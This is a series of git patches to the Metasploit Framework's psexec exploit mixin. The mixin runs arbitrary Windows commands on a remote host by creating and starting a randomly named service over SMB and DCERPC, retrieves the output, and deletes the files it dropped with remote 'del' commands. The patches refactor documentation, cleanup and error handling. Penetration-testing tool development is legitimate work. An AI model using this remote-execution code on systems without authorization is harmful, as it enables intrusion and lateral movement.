From af2b1ec25b72f8e6c28f213555d8c71d0c8b9f5f Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 15 Jan 2013 14:22:11 -0600 Subject: [PATCH 01/87] Clean up doc comments --- lib/msf/core/exploit/psexec.rb | 44 ++++++++++++++++++++-------------- 1 file changed, 26 insertions(+), 18 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index 103241a30f..e31a6a68c1 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -13,12 +13,15 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - # Retrives output from the executed command + # Retrieves output from the executed command + # + # @example + # get_output("C$", rhost, '\WINDOWS\Temp\outputfile.txt') + # # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param file [File name] Path to the output file relative to the smbshare - # Example: '\WINDOWS\Temp\outputfile.txt' - # @return output or nil if fails + # @param ip [String] Remote host to connect to + # @param file [String] Path to the output file relative to the +smbshare+ + # @return [String,nil] output or nil if retrieval fails def get_output(smbshare, ip, file) begin print_status("Getting the command output...") @@ -35,12 +38,14 @@ module Exploit::Remote::Psexec end - # This method executes a single windows command. If you want to - # retrieve the output of your command you'll have to echo it - # to a .txt file and then use the get_output method to retrieve it - # Make sure to use the cleanup_after method when you are done. + # Executes a single windows command. + # + # If you want to retrieve the output of your command you'll have to + # redirect its output to a file and then use {#get_output} to retrieve + # it. Make sure to use the {#cleanup_after} method when you are done. + # # @param command [String] Should be a valid windows command - # @return true if everything wen't well + # @return [Boolean] true if everything wen't well def psexec(command) simple.connect("IPC$") @@ -152,14 +157,17 @@ module Exploit::Remote::Psexec return true end - # This is the cleanup method, removes .txt and .bat file/s created during execution + # This is the cleanup method, removes .txt and .bat file/s created + # during execution + # + # @example + # cleanup_after("C$", rhost, '\WINDOWS\Temp\output.txt', 'C:\WINDOWS\Temp\batchfile.bat') + # # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param text [File Path] Path to the text file relative to the smbshare - # Example: '\WINDOWS\Temp\output.txt' - # @param bat [File Path] Full path to the batch file created - # Example: 'C:\WINDOWS\Temp\batchfile.bat' - # @return only in the event of an error + # @param ip [String] IP address of remote host to connect to + # @param text [String] Path to the text file relative to the smbshare + # @param bat [String] Full path to the batch file created + # @return [StandarError] only in the event of an error def cleanup_after(smbshare, ip, text, bat) begin # Try and do cleanup command/s @@ -183,7 +191,7 @@ module Exploit::Remote::Psexec def check_cleanup(smbshare, ip, text) simple.connect("\\\\#{ip}\\#{smbshare}") begin - if checktext = simple.open(text, 'ro') + if simple.open(text, 'ro') check = false else check = true From 6773a1063227173c3ce3f0a36ef42fa5aada7190 Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Tue, 15 Jan 2013 16:24:16 -0600 Subject: [PATCH 02/87] Made changes to cleanup to use file_dropper instead --- lib/msf/core/exploit/psexec.rb | 45 ++++++++++++---------------------- 1 file changed, 16 insertions(+), 29 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index e31a6a68c1..7e8b030564 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -12,6 +12,7 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB + include Msf::Exploit::FileDropper # Retrieves output from the executed command # @@ -47,7 +48,7 @@ module Exploit::Remote::Psexec # @param command [String] Should be a valid windows command # @return [Boolean] true if everything wen't well def psexec(command) - + print_status("#{peer} - Executing: #{command}") simple.connect("IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) @@ -157,34 +158,20 @@ module Exploit::Remote::Psexec return true end - # This is the cleanup method, removes .txt and .bat file/s created - # during execution - # - # @example - # cleanup_after("C$", rhost, '\WINDOWS\Temp\output.txt', 'C:\WINDOWS\Temp\batchfile.bat') - # - # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [String] IP address of remote host to connect to - # @param text [String] Path to the text file relative to the smbshare - # @param bat [String] Full path to the batch file created - # @return [StandarError] only in the event of an error - def cleanup_after(smbshare, ip, text, bat) - begin - # Try and do cleanup command/s - cleanup = "%COMSPEC% /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup...") - psexec(cleanup) - if !check_cleanup(smbshare, ip, text) - print_error("#{peer} - Unable to cleanup. Make sure to manually remove files from the target.") - else - print_status("#{peer} - Cleanup was successful") - end - rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands. Error: #{cleanuperror}") - print_error("#{peer} - Make sure to manually remove files from the target") - return cleanuperror - end - end + # This method is called by file_dropper to remove files droped + # By your module + # + # @example + # file_rm('C:\WINDOWS\Temp\output.txt') + # + # @param file [String] Full path to a file on the remote host + # @return [StandardError] only in the event of an error + def file_rm(file) + delete = "%COMSPEC% /C del #{file}" + print_status("#{peer} - Deleting #{file}") + psexec(delete) + print_status("#{peer} - Command Ran") + end # Make sure the cleanup command worked # This method should only be called from within cleanup_after From f7571d89de913ccfb1fe0104d7f95d5ac6cb9f5b Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Wed, 16 Jan 2013 09:56:27 -0600 Subject: [PATCH 03/87] Fixed cleanup_after funciton to mimic file_dropper but not use file_dropper --- lib/msf/core/exploit/psexec.rb | 307 +++++++++++++++++---------------- 1 file changed, 156 insertions(+), 151 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index 7e8b030564..570dcd1634 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -10,153 +10,147 @@ module Msf module Exploit::Remote::Psexec - include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB - include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB - # Retrieves output from the executed command - # - # @example - # get_output("C$", rhost, '\WINDOWS\Temp\outputfile.txt') - # - # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [String] Remote host to connect to - # @param file [String] Path to the output file relative to the +smbshare+ - # @return [String,nil] output or nil if retrieval fails - def get_output(smbshare, ip, file) - begin - print_status("Getting the command output...") - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return output - rescue StandardError => output_error - print_error("Error getting command output. #{output_error.class}. #{output_error}.") - return nil - end - end + # Retrives output from the executed command + # @param smbshare [String] The SMBshare to connect to. Usually C$ + # @param ip [IP Address] Remote Host to Connect To + # @param file [File name] Path to the output file relative to the smbshare + # Example: '\WINDOWS\Temp\outputfile.txt' + # @return output or nil if fails + def get_output(smbshare, ip, file) + begin + print_status("Getting the command output...") + simple.connect("\\\\#{ip}\\#{smbshare}") + outfile = simple.open(file, 'ro') + output = outfile.read + outfile.close + simple.disconnect("\\\\#{ip}\\#{smbshare}") + return output + rescue StandardError => output_error + print_error("Error getting command output. #{output_error.class}. #{output_error}.") + return nil + end + end - # Executes a single windows command. - # - # If you want to retrieve the output of your command you'll have to - # redirect its output to a file and then use {#get_output} to retrieve - # it. Make sure to use the {#cleanup_after} method when you are done. - # - # @param command [String] Should be a valid windows command - # @return [Boolean] true if everything wen't well - def psexec(command) - print_status("#{peer} - Executing: #{command}") - simple.connect("IPC$") + # This method executes a single windows command. If you want to + # retrieve the output of your command you'll have to echo it + # to a .txt file and then use the get_output method to retrieve it + # Make sure to use the cleanup_after method when you are done. + # @param command [String] Should be a valid windows command + # @return true if everything wen't well + def psexec(command) - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") - dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") + simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - vprint_status("#{peer} - Obtaining a service manager handle...") - scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) - begin - response = dcerpc.call(0x0f, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - scm_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) + vprint_status("#{peer} - Binding to #{handle} ...") + dcerpc_bind(handle) + vprint_status("#{peer} - Bound to #{handle} ...") - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) - holdhandle = scm_handle - svc_handle = nil - svc_status = nil + vprint_status("#{peer} - Obtaining a service manager handle...") + scm_handle = nil + stubdata = + NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) + begin + response = dcerpc.call(0x0f, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + scm_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + servicename = Rex::Text.rand_text_alpha(11) + displayname = Rex::Text.rand_text_alpha(16) + holdhandle = scm_handle + svc_handle = nil + svc_status = nil - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password - begin - vprint_status("#{peer} - Creating the service...") - response = dcerpc.call(0x0c, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - svc_status = dcerpc.last_response.stub_data[24,4] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception - end + NDR.long(0x0F01FF) + # Access: MAX + NDR.long(0x00000110) + # Type: Interactive, Own process + NDR.long(0x00000003) + # Start: Demand + NDR.long(0x00000000) + # Errors: Ignore + NDR.wstring( command ) + + NDR.long(0) + # LoadOrderGroup + NDR.long(0) + # Dependencies + NDR.long(0) + # Service Start + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) # Password + begin + vprint_status("#{peer} - Creating the service...") + response = dcerpc.call(0x0c, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + svc_status = dcerpc.last_response.stub_data[24,4] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Opening service...") - begin - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception + end - response = dcerpc.call(0x10, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + vprint_status("#{peer} - Opening service...") + begin + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) - vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + NDR.long(0) + NDR.long(0) - begin - response = dcerpc.call(0x13, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + response = dcerpc.call(0x10, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle - begin - response = dcerpc.call(0x02, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end + vprint_status("#{peer} - Starting the service...") + stubdata = + svc_handle + NDR.long(0) + NDR.long(0) + begin + response = dcerpc.call(0x13, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end + vprint_status("#{peer} - Removing the service...") + stubdata = + svc_handle + begin + response = dcerpc.call(0x02, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end - select(nil, nil, nil, 1.0) - simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") - return true - end + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end + + select(nil, nil, nil, 1.0) + simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") + return true + end # This method is called by file_dropper to remove files droped # By your module @@ -168,28 +162,39 @@ module Exploit::Remote::Psexec # @return [StandardError] only in the event of an error def file_rm(file) delete = "%COMSPEC% /C del #{file}" - print_status("#{peer} - Deleting #{file}") + vprint_status("#{peer} - Deleting #{file}") psexec(delete) - print_status("#{peer} - Command Ran") end - # Make sure the cleanup command worked - # This method should only be called from within cleanup_after - def check_cleanup(smbshare, ip, text) - simple.connect("\\\\#{ip}\\#{smbshare}") - begin - if simple.open(text, 'ro') - check = false - else - check = true - end - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return check - rescue StandardError => check_error - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return true - end - end + # This method stores files in an Instance array + # The files are then deleted from the remote host once + # the cleanup_after method is called + # + # @example + # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") + # @param file [String] Full path to the file on the remote host + def register_file_for_cleanup(*file) + @dropped_files ||= [] + @dropped_files += file + end + + # This method removes any files that were dropped on the remote system + # and marked with the register_file_for_cleanup method + def cleanup_after + print_status("#{peer} - Removing files dropped by your module/exploit") + if !@dropped_files + return + end + @dropped_files.delete_if do |file| + begin + file_rm(file) + print_good("#{peer} - Deleted #{file}") + rescue StandardError => file_rm_error + print_error("#{peer} - Unable to delte #{file}. #{file_rm_error}") + return + end + end + end end From 00a9c7259599c92528b50e246ef83288c84f25c3 Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Thu, 17 Jan 2013 19:02:13 -0600 Subject: [PATCH 04/87] Fixed exception handeling. No longer using rescure StandardError --- lib/msf/core/exploit/psexec.rb | 345 ++++++++++++++++----------------- 1 file changed, 172 insertions(+), 173 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index 570dcd1634..9763b6d1f7 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -10,192 +10,191 @@ module Msf module Exploit::Remote::Psexec - include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB - # Retrives output from the executed command - # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param file [File name] Path to the output file relative to the smbshare - # Example: '\WINDOWS\Temp\outputfile.txt' - # @return output or nil if fails - def get_output(smbshare, ip, file) - begin - print_status("Getting the command output...") - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return output - rescue StandardError => output_error - print_error("Error getting command output. #{output_error.class}. #{output_error}.") - return nil - end - end - - - # This method executes a single windows command. If you want to - # retrieve the output of your command you'll have to echo it - # to a .txt file and then use the get_output method to retrieve it - # Make sure to use the cleanup_after method when you are done. - # @param command [String] Should be a valid windows command - # @return true if everything wen't well - def psexec(command) - - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") - dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - - vprint_status("#{peer} - Obtaining a service manager handle...") - scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) - begin - response = dcerpc.call(0x0f, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - scm_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false + # Retrives output from the executed command + # @param smbshare [String] The SMBshare to connect to. Usually C$ + # @param ip [IP Address] Remote Host to Connect To + # @param file [File name] Path to the output file relative to the smbshare + # Example: '\WINDOWS\Temp\outputfile.txt' + # @return output or nil if fails + def get_output(smbshare, ip, file) + begin + print_status("Getting the command output...") + simple.connect("\\\\#{ip}\\#{smbshare}") + outfile = simple.open(file, 'ro') + output = outfile.read + outfile.close + simple.disconnect("\\\\#{ip}\\#{smbshare}") + return output + rescue Rex::Proto::SMB::Exceptions::ErrorCode => output_error + print_error("#{peer} - The file #{file} doesn't exist. #{output_error}.") + return nil + end end - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) - holdhandle = scm_handle - svc_handle = nil - svc_status = nil - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + # This method executes a single windows command. If you want to + # retrieve the output of your command you'll have to echo it + # to a .txt file and then use the get_output method to retrieve it + # Make sure to use the cleanup_after method when you are done. + # @param command [String] Should be a valid windows command + # @return true if everything wen't well + def psexec(command) - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password - begin - vprint_status("#{peer} - Creating the service...") - response = dcerpc.call(0x0c, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - svc_status = dcerpc.last_response.stub_data[24,4] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false + simple.connect("\\\\#{datastore['RHOST']}\\IPC$") + + handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) + vprint_status("#{peer} - Binding to #{handle} ...") + dcerpc_bind(handle) + vprint_status("#{peer} - Bound to #{handle} ...") + + vprint_status("#{peer} - Obtaining a service manager handle...") + scm_handle = nil + stubdata = + NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) + begin + response = dcerpc.call(0x0f, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + scm_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end + + servicename = Rex::Text.rand_text_alpha(11) + displayname = Rex::Text.rand_text_alpha(16) + holdhandle = scm_handle + svc_handle = nil + svc_status = nil + + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + + NDR.long(0x0F01FF) + # Access: MAX + NDR.long(0x00000110) + # Type: Interactive, Own process + NDR.long(0x00000003) + # Start: Demand + NDR.long(0x00000000) + # Errors: Ignore + NDR.wstring( command ) + + NDR.long(0) + # LoadOrderGroup + NDR.long(0) + # Dependencies + NDR.long(0) + # Service Start + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) # Password + begin + vprint_status("#{peer} - Creating the service...") + response = dcerpc.call(0x0c, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + svc_status = dcerpc.last_response.stub_data[24,4] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end + + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception + end + + vprint_status("#{peer} - Opening service...") + begin + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) + + response = dcerpc.call(0x10, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + svc_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end + + vprint_status("#{peer} - Starting the service...") + stubdata = + svc_handle + NDR.long(0) + NDR.long(0) + begin + response = dcerpc.call(0x13, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end + + vprint_status("#{peer} - Removing the service...") + stubdata = + svc_handle + begin + response = dcerpc.call(0x02, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end + + vprint_status("#{peer} - Closing service handle...") + begin + response = dcerpc.call(0x0, svc_handle) + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + end + + select(nil, nil, nil, 1.0) + simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") + return true end - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception + # This method is called by file_dropper to remove files droped + # By your module + # + # @example + # file_rm('C:\WINDOWS\Temp\output.txt') + # + # @param file [String] Full path to a file on the remote host + # @return [StandardError] only in the event of an error + def file_rm(file) + delete = "%COMSPEC% /C del #{file}" + vprint_status("#{peer} - Deleting #{file}") + psexec(delete) end - vprint_status("#{peer} - Opening service...") - begin - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) - - response = dcerpc.call(0x10, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - svc_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false + # This method stores files in an Instance array + # The files are then deleted from the remote host once + # the cleanup_after method is called + # + # @example + # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") + # @param file [String] Full path to the file on the remote host + def register_file_for_cleanup(*file) + @dropped_files ||= [] + @dropped_files += file end - vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + NDR.long(0) + NDR.long(0) - begin - response = dcerpc.call(0x13, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false + # This method removes any files that were dropped on the remote system + # and marked with the register_file_for_cleanup method + def cleanup_after + print_status("#{peer} - Removing files dropped by your module/exploit") + if !@dropped_files + return + end + begin + @dropped_files.delete_if do |file| + file_rm(file) + print_good("#{peer} - Deleted #{file}") + end + rescue ::Exception => cleanup_error + print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") + end end - vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle - begin - response = dcerpc.call(0x02, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end - - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end - - select(nil, nil, nil, 1.0) - simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") - return true - end - - # This method is called by file_dropper to remove files droped - # By your module - # - # @example - # file_rm('C:\WINDOWS\Temp\output.txt') - # - # @param file [String] Full path to a file on the remote host - # @return [StandardError] only in the event of an error - def file_rm(file) - delete = "%COMSPEC% /C del #{file}" - vprint_status("#{peer} - Deleting #{file}") - psexec(delete) - end - - # This method stores files in an Instance array - # The files are then deleted from the remote host once - # the cleanup_after method is called - # - # @example - # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") - # @param file [String] Full path to the file on the remote host - def register_file_for_cleanup(*file) - @dropped_files ||= [] - @dropped_files += file - end - - # This method removes any files that were dropped on the remote system - # and marked with the register_file_for_cleanup method - def cleanup_after - print_status("#{peer} - Removing files dropped by your module/exploit") - if !@dropped_files - return - end - @dropped_files.delete_if do |file| - begin - file_rm(file) - print_good("#{peer} - Deleted #{file}") - rescue StandardError => file_rm_error - print_error("#{peer} - Unable to delte #{file}. #{file_rm_error}") - return - end - end - end - end end From a2f66a8fef6dc2620e0a54d4b53a32bd36a85d7c Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Fri, 18 Jan 2013 09:33:44 -0600 Subject: [PATCH 05/87] Fixed msftidy complaints --- lib/msf/core/exploit/psexec.rb | 330 ++++++++++++++++----------------- 1 file changed, 165 insertions(+), 165 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index 9763b6d1f7..b10e1453f3 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -10,190 +10,190 @@ module Msf module Exploit::Remote::Psexec - include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB - # Retrives output from the executed command - # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param file [File name] Path to the output file relative to the smbshare - # Example: '\WINDOWS\Temp\outputfile.txt' - # @return output or nil if fails - def get_output(smbshare, ip, file) - begin - print_status("Getting the command output...") - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return output - rescue Rex::Proto::SMB::Exceptions::ErrorCode => output_error - print_error("#{peer} - The file #{file} doesn't exist. #{output_error}.") - return nil - end - end + # Retrives output from the executed command + # @param smbshare [String] The SMBshare to connect to. Usually C$ + # @param ip [IP Address] Remote Host to Connect To + # @param file [File name] Path to the output file relative to the smbshare + # Example: '\WINDOWS\Temp\outputfile.txt' + # @return output or nil if fails + def get_output(smbshare, ip, file) + begin + print_status("Getting the command output...") + simple.connect("\\\\#{ip}\\#{smbshare}") + outfile = simple.open(file, 'ro') + output = outfile.read + outfile.close + simple.disconnect("\\\\#{ip}\\#{smbshare}") + return output + rescue Rex::Proto::SMB::Exceptions::ErrorCode => output_error + print_error("#{peer} - The file #{file} doesn't exist. #{output_error}.") + return nil + end + end - # This method executes a single windows command. If you want to - # retrieve the output of your command you'll have to echo it - # to a .txt file and then use the get_output method to retrieve it - # Make sure to use the cleanup_after method when you are done. - # @param command [String] Should be a valid windows command - # @return true if everything wen't well - def psexec(command) + # This method executes a single windows command. If you want to + # retrieve the output of your command you'll have to echo it + # to a .txt file and then use the get_output method to retrieve it + # Make sure to use the cleanup_after method when you are done. + # @param command [String] Should be a valid windows command + # @return true if everything wen't well + def psexec(command) - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") + simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") - dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") + handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) + vprint_status("#{peer} - Binding to #{handle} ...") + dcerpc_bind(handle) + vprint_status("#{peer} - Bound to #{handle} ...") - vprint_status("#{peer} - Obtaining a service manager handle...") - scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) - begin - response = dcerpc.call(0x0f, stubdata) - if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil - scm_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end + vprint_status("#{peer} - Obtaining a service manager handle...") + scm_handle = nil + stubdata = + NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) + begin + response = dcerpc.call(0x0f, stubdata) + if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil + scm_handle = dcerpc.last_response.stub_data[0,20] + end + rescue ::Exception => e + print_error("#{peer} - Error: #{e}") + return false + end - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) - holdhandle = scm_handle - svc_handle = nil - svc_status = nil + servicename = Rex::Text.rand_text_alpha(11) + displayname = Rex::Text.rand_text_alpha(16) + holdhandle = scm_handle + svc_handle = nil + svc_status = nil - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + stubdata = + scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup 